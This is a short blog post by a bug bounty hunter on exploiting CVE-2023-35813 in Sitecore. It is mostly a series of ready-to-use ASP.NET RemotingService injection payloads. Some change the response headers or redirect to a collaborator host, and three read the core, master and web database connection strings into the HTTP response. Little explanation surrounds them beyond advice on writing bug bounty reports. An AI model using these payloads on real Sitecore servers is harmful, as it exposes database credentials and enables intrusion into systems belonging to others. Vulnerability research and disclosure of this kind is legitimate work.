Exploiting CVE-2023–35813: Retrieving Core Connection Strings in Sitecore

Abhishek Morla
2 min readDec 25, 2023

In the realm of cybersecurity, the discovery and analysis of vulnerabilities play a crucial role. CVE-2023–35813, a notable vulnerability in Sitecore, opens a window into understanding the delicate balance between exploiting a weakness for profit and the ethics of responsible disclosure. This article sheds light on the practical aspects of exploiting this vulnerability, specifically targeting retrieving core connection strings.

Exploring CVE-2023–35813

For a detailed understanding of CVE-2023–35813, refer to an insightful blog post on Code White’s Blog. This resource provides a comprehensive backdrop, setting the stage for a deeper dive into the actual exploitation process.

Practical Exploitation in the Absence of SMB

Authored by abhishekmorla, this section delves into the hands-on approach to exploiting CVE-2023–35813 when a Server Message Block (SMB) is not available. This scenario, while reducing the CVSS score, still presents significant opportunities for extracting valuable information. demonstrating how to manipulate different aspects of the server’s response. This manipulation not only showcases the vulnerability’s impact but also guides on what to include in a bug bounty report for enhanced effectiveness.

  1. Start by changing the content type:
<%@Register
TagPrefix = 'x'
Namespace = 'System.Runtime.Remoting.Services'
Assembly = 'System.Runtime.Remoting, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'
%>
<x:RemotingService runat='server'
Context-Response-ContentType='abhishekmorla was here'
/>

2. Altering Status Code:

<%@Register
TagPrefix = 'x'
Namespace = 'System.Runtime.Remoting.Services'
Assembly = 'System.Runtime.Remoting, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'
%>
<x:RemotingService runat='server'
Context-Response-StatusCode='302'
/>

3. Redirecting to a Different Location:

<%@Register
TagPrefix = 'x'
Namespace = 'System.Runtime.Remoting.Services'
Assembly = 'System.Runtime.Remoting, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'
%>
<x:RemotingService runat='server'
Context-Response-StatusCode='302'
Context-Response-RedirectLocation='http://burp.collab'
/>

above modifications, while demonstrating the exploit, might not be appropriate for bug bounty platform reports.

Retrieving Connection Strings:

  1. For core connection strings:
<%@Register
TagPrefix = 'x'
Namespace = 'System.Runtime.Remoting.Services'
Assembly = 'System.Runtime.Remoting, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'
%>
<x:RemotingService runat='server'
Context-Response-ContentType='<%$ ConnectionStrings:core %>'
/>

2. For masters:

<%@Register
TagPrefix = 'x'
Namespace = 'System.Runtime.Remoting.Services'
Assembly = 'System.Runtime.Remoting, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'
%>
<x:RemotingService runat='server'
Context-Response-ContentType='<%$ ConnectionStrings:master %>'
/>

3. For Web:

<%@Register
TagPrefix = 'x'
Namespace = 'System.Runtime.Remoting.Services'
Assembly = 'System.Runtime.Remoting, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'
%>
<x:RemotingService runat='server'
Context-Response-ContentType='<%$ ConnectionStrings:web %>'
/>

Remember to include the above crucial findings in your bug bounty report. Detailed reporting increases the likelihood of quick acceptance and potentially earning a bounty :)

For a comprehensive walkthrough, kindly refer to the accompanying proof of concept (POC) https://youtu.be/vWKl9wgdTB0

thanks for reading!

LinkedIn: https://www.linkedin.com/in/abhishekmorla/

Twitter : https://twitter.com/abhishekmorla

--

--

Abhishek Morla

Security Consultant | CSE Student | Synack Red Team & Yogosha Member | Detectify Crowdsource Member | Prohacker at HacktheBox | 40+ Hall of fame